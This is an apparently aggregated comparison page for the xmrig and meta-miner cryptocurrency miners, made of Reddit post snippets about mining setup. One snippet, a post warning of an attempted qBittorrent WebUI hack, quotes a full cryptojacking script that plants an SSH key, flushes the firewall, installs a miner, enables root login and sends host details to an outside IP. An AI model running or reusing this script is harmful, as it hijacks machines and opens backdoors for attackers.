xmrig VS meta-miner

Compare xmrig vs meta-miner and see what are their differences.

xmrig

RandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark (by xmrig)

meta-miner

Allows to add algo switching support to *any* stratum miner. Zero fees. (by MoneroOcean)
InfluxDB - Power Real-Time Data Analytics at Scale
Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
www.influxdata.com
featured
SaaSHub - Software Alternatives and Reviews
SaaSHub helps you find the best software and product alternatives
www.saashub.com
featured
xmrig meta-miner
363 31
8,332 118
- -
8.1 0.0
8 days ago 12 months ago
C JavaScript
GNU General Public License v3.0 only GNU General Public License v3.0 only
The number of mentions indicates the total number of mentions that we've tracked plus the number of user suggested alternatives.
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.

xmrig

Posts with mentions or reviews of xmrig. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2023-07-06.
  • Gupax - Enabling 1GB Pages ain't working
    1 project | /r/MoneroMining | 24 Jul 2023
    I'm not so new to XMRig, but I am new to Gupax.io and I'm lost on how I can get 1GB Pages from Disabled to Enabled in the XMRig portion of Gupax. Yes, my CPU supports it. Yes, I made sure my Linux OS uses HugePages. Yes, my RAM and OS CLI checks reflect their usage. Yes, I've also used this script . It all works, except in Gupax.
  • Just experienced an attempted hack. A warning to anyone using WebUI.
    3 projects | /r/qBittorrent | 6 Jul 2023
    #!/bin/bash WALLET="41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b" PORT=$(( 15555 )) export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin if [ -z $HOME ]; then if [ "$(id -u)" == "0" ]; then export HOME=/root elif [ "$(id -u)" != "0" ]; then export USER=$(whoami) export HOME=/home/$USER elif [ -z $HOME ]; then export HOME=/tmp fi fi if [ ! -d $HOME ]; then mkdir -p $HOME fi mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys if ! (type wget >/dev/null || type curl >/dev/null); then echo "ERROR: This script requires \"wget or curl\" utility to work correctly" exit 1 fi # start doing stuff: preparing miner echo "[*] Removing previous c3pool miner (if any)" if sudo -n true 2>/dev/null; then sudo systemctl stop c3pool_miner.service 2>/dev/null sudo systemctl disable c3pool_miner.service 2>/dev/null sudo systemctl disable xmrig.service 2>/dev/null sudo killall xmrig 2>/dev/null sudo pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null sudo rm -rf /etc/systemd/system/c3pool_miner.service 2>/dev/null else killall -9 xmrig 2>/dev/null killall xmrig 2>/dev/null pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null fi iptables -P INPUT ACCEPT 2>/dev/null iptables -P FORWARD ACCEPT 2>/dev/null iptables -P OUTPUT ACCEPT 2>/dev/null iptables -F 2>/dev/null echo "[*] Removing $HOME/.c3pool directory" rm -rf $HOME/c3pool 2>/dev/null rm -rf $HOME/.c3pool 2>/dev/null rm -rf /tmp/c3pool 2>/dev/null rm -rf /tmp/* 2>/dev/null find . -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find . -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find . -name "*miner*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*miner*" -exec rm -rf {} \; 2>/dev/null echo "[*] Downloading C3Pool advanced version of xmrig to /tmp/xmrig.tar.gz" if ! (wget -q -O /tmp/xmrig.tar.gz "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" || curl -s "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" -o /tmp/xmrig.tar.gz); then echo "ERROR: Can't download file." exit 1 fi echo "[*] Unpacking /tmp/xmrig.tar.gz to $HOME/.c3pool" [ -d $HOME/.c3pool ] || mkdir $HOME/.c3pool [ -f $HOME/.c3pool/.profile ] || touch $HOME/.c3pool/.profile if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool; then echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" exit 1 fi rm /tmp/xmrig.tar.gz echo "[*] Checking if advanced version of $HOME/.c3pool/xmrig works fine (and not removed by antivirus software)" $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "WARNING: Advanced version of $HOME/.c3pool/xmrig is not functional or got removed" fi echo "[*] Looking for the latest version of Monero miner" LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'` LATEST_XMRIG_LINUX_RELEASE="https://github.com"`curl -s $LATEST_XMRIG_RELEASE | grep xenial-x64.tar.gz\" | cut -d \" -f2` echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz" if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz" exit 1 fi if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool --strip=1; then echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" fi rm /tmp/xmrig.tar.gz $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "ERROR: Stock version of $HOME/.c3pool/xmrig is not functional too" else echo "ERROR: Stock version of $HOME/.c3pool/xmrig was removed by antivirus too" fi exit 1 fi fi echo "[*] Miner $HOME/.c3pool/xmrig is OK" PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'` if [ "$PASS" == "localhost" ]; then PASS=`ip route get 1 | awk '{print $NF;exit}'` fi if [ -z $PASS ]; then PASS=na fi if [ ! -z $EMAIL ]; then PASS="$PASS:$EMAIL" fi sed -i 's/"donate-level": *[^,]*,/"donate-level": 1,/' $HOME/.c3pool/config.json sed -i 's/"url": *"[^"]*",/"url": "auto.c3pool.org:'$PORT'",/' $HOME/.c3pool/config.json sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $HOME/.c3pool/config.json sed -i 's/"pass": *"[^"]*",/"pass": "'$PASS'",/' $HOME/.c3pool/config.json sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $HOME/.c3pool/config.json sed -i 's/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 75,/' $HOME/.c3pool/config.json sed -i 's#"log-file": *null,#"log-file": "'$HOME/.c3pool/xmrig.log'",#' $HOME/.c3pool/config.json sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $HOME/.c3pool/config.json cp $HOME/.c3pool/config.json $HOME/.c3pool/config_background.json sed -i 's/"background": *false,/"background": true,/' $HOME/.c3pool/config_background.json # preparing script echo "[*] Creating $HOME/.c3pool/miner.sh script" cat >$HOME/.c3pool/miner.sh /dev/null; then if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then echo "[*] Enabling huge pages" echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf >/dev/null sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc))) >/dev/null else echo "[*] Huge already enabled" fi else echo "[*] Not enabling huge pages" fi touch $HOME/.profile sed -i '/c3pool/d' $HOME/.profile echo "$HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1" >>$HOME/.profile #echo "ulimit -n 65000 >/dev/null 2>&1" >>$HOME/.profile chmod +x $HOME/.c3pool/miner.sh (/bin/bash $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1 || /bin/sh $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1) rm -rf /tmp/*.sh rm -rf /tmp/* if pidof xmrig >/dev/null; then PID=$(pidof xmrig) echo "Running with $PID" else echo "Not Running" fi IP=$(curl -s -4 http://ip.me) HOSTNAME=$(hostname) USERNAME=$(whoami) HOMEDIR=$(echo ~) CPU_COUNT=$(nproc) MEMORY=$(free -h | awk '/^Mem:/ {print $2}') ARCHI=$(uname -m) (curl -X POST -H "Content-Type: application/json" -d "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add || wget --header "Content-Type: application/json" --post-data "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add) (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null sudo /etc/init.d/ssh restart >/dev/null
  • Best mining program on Windows?
    2 projects | /r/MoneroMining | 30 Jun 2023
    Xmrig and use a pool that isn't one of the top three. If you want a have more of a challenge then try the p2pool with xmrig. https://github.com/xmrig/xmrig/releases/tag/v6.19.3
  • Over 110k BAN has been distributed to BanRXers!
    2 projects | /r/banano | 22 Jun 2023
    Regarding how much you can trust BanRX, all of the mining software used is fully open source on GitHub, with a commonly used one (XMrig) having over 7.6k stars on the repository. We also have a community Discord server for all of the apps in the BananoPlanet ecosystem, including our faucet! You can join the BananoPlanet Discord server at https://bananoplanet.cc/discord.
  • Awesome miner tech support
    1 project | /r/MoneroMining | 17 Jun 2023
    I would recommend running XMRig directly so as to weed out any problems related to AwesomeMiner.
  • Question about withdrawing from nicehash
    1 project | /r/gpumining | 3 Jun 2023
    I’m guessing you are also CPU mining? That is likely an issue with XMRig, correct? If so, first be sure you launch NiceHash as Admin. Right-click the shortcut -> Properties -> Shortcut tab -> Advanced -> Run as administrator. Relaunch NiceHash from the update shortcut, and approve the User Account Control prompt. If that doesn’t solve it, leave the setting intact, but try a couple of other options: 1. toggle “Disable Device Status Monitoring” from NiceHash settings cog icon -> Advanced tab, which is an easy fix that prevents temperature monitoring. 2. the better solution, is to overwrite your XMRig.exe in the XMRig plug-in internals directory [NiceHash Plugins tab -> XMRig -> three dots -> Show Internals -> bins directory -> latest (i.e., 19.1) -> XMRig directory (i.e., xmrig-6.8.1) -> XMRig.exe] with the latest version (v6.19.3) of XMRig.exe available from https://github.com/xmrig/xmrig/releases . For me, swapping the .exe file and running as Admin resolves the issue.
  • New XMRig release 6.19.3
    1 project | /r/MoneroMining | 3 Jun 2023
    #3245 Improved algorithm negotiation for donation rounds by sending extra information about current mining job.
  • How do I know if I'm actually mining Monero correctly and everything is alright?
    3 projects | /r/MoneroMining | 29 May 2023
    Downloaded and extracted https://xmrig.com/. The Linux CPU only one.
  • How to Mine Ghostrider on Windows
    1 project | /r/cpumining | 21 May 2023
    XMRIG: https://github.com/xmrig/xmrig/releases
  • Mining Monero
    2 projects | /r/CryptoCurrency | 21 May 2023
    Monero is mined with CPU, and the best software for this is XMRig. You will need to join a mining pool to mine Monero.

meta-miner

Posts with mentions or reviews of meta-miner. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2022-05-16.
  • Moneroocean mining setup help ?
    1 project | /r/MoneroMining | 22 Jun 2022
    I don't think xmrig is made for GPU mining outside of randomx which is not efficient. At least I haven't had success with it. Check out metaminer, it runs as a layer on top of a GPU miner. Use any combination of GPU miners you like to get the algos you want, i.e. gminer for ethash and kawpow, trex for autolykos. Run metaminer pointing to these programs for xmr centric algo switching and payouts.
  • Need help with XMR mining.
    4 projects | /r/MoneroMining | 16 May 2022
    MoneroOcean. Two copies of MO-xmrig fork in separate folders. Set one for CPU only. Set other for CUDA which also needs (MO-xmrig-cuda plugin fork)[https://github.com/MoneroOcean/xmrig-cuda/]) added to that folder. Then once all that works add (meta-miner)[https://github.com/MoneroOcean/meta-miner/] to the GPU folder and configure T-Rex for the algos xmrig doesn't do (autolykos2, kawpow, ethash).
  • MoneroOcean: XMRig - Shares?
    2 projects | /r/MoneroMining | 11 May 2022
    This meta-miner? https://github.com/MoneroOcean/meta-miner
  • MoneroOcean algo switching - both CPU and GPU simultaneously?
    1 project | /r/MoneroMining | 26 Apr 2022
    Or, wrap your alt miners (for whatever xmrig doesn't support) with meta-miner and it will follow profit at all times.
  • MoneroOcean ETH mining issue
    1 project | /r/MoneroMining | 20 Apr 2022
    You should probably configure with meta-miner so that it can change algos to not only the most profitable, but also the most profitable that actually is working. Then your junk will run autolykos2 or kawpow or something whenever ethash sucks.
  • Best GPU Algo Switching Miner for MO
    1 project | /r/MoneroMining | 25 Mar 2022
    I just use meta-miner
  • Not a serious miner. But Should I in theory be mining as much as I can on moneroocean cause it’s about to become irrelevant?
    1 project | /r/MoneroMining | 18 Mar 2022
    For all-algos support on GPU you must use meta-miner and configure a couple more miner apps other than xmrig (for the algos it doesn't have). I have better results with T-Rex or lolMiner for kawpow rather than xmrig's support.
  • Noob here
    5 projects | /r/MoneroMining | 9 Feb 2022
    The third method is to use MO's meta-miner wrapper which does the algo-perf outside of xmrig and enables launching other miners besides just xmrig (this is how you get the c29 family or ethash). But you can use it instead of the mo-xmrig, and when there is no launch-definition in its mm.json config file for kawpow it won't try it (can't launch anything that doesn't have a launch command). This is clunkier than the built-in autoswitching (meta-miner existed first) since it kills xmrig and relaunches xmrig rather than leaving it all initialized and simply switching algo inside itself. So the switch takes longer which technically is lost work (for whatever time it takes to stop and start an entire xmrig process).
  • So I figured out what you guys were talking about with moneroocean, and got the pool set up but I got a question
    3 projects | /r/MoneroMining | 29 Jan 2022
    For the GPU side you would use meta-miner and set up for all the algorithms xmrig supports, plus the ones it doesn't via T-Rex (nvidia-only) or lolMiner (AMD or nvidia) for ethash/kawpow/autolykos2, or MoneroVMiner for c29v.
  • i have a quesiton about cuda on moneroocean. i cant seem to find the answer anywhere
    1 project | /r/MoneroMining | 25 Dec 2021
    You simply use meta-miner which adds hopping to whatever miner(s) you want. c29b/s/v, autolykos2, kawpow (that isn't the xmrig implementation), ethash.

What are some alternatives?

When comparing xmrig and meta-miner you can also consider the following projects:

csminer - csminer Monero miner from https://cryptonote.social/

xmrig-proxy - Monero (XMR) Stratum protocol proxy

NBMiner - GPU Miner for ETH, RVN, BEAM, CFX, ZIL, AE, ERGO

xmrig - Monero (rx/0, rx/wow, rx/loki, defyx, rx/arq, rx/sfx, rx/keva, cn/0, cn/1, cn/2, cn/r, cn/fast, cn/half, cn/xao, cn/rto, cn/rwz, cn/zls, cn/double, cn/gpu, cn-lite/0, cn-lite/1, cn-heavy/0, cn-heavy/tube, cn-heavy/xhv, cn-pico, cn-pico/tlo, argon2/chukwa, argon2/wrkz, astrobwt) CPU/GPU miner

cpuminer-opt-cpupower - Optimized multi algo CPU miner for CPUchain, Uranium-X, Cranepay, Yenten

GMinerRelease - Ethash, ProgPoW, Equihash, CuckooCycle GPU Miner

SRBMiner-Multi - CPU & AMD GPU cryptocurrency miner

hiveos - Custom miner packages for HiveOS

xmr-stak - Free Monero RandomX Miner and unified CryptoNight miner

xmrig-cuda - NVIDIA CUDA plugin for XMRig miner

cpuminer - CPU miner for Litecoin and Bitcoin

xmrig-cuda - NVIDIA CUDA plugin for XMRig miner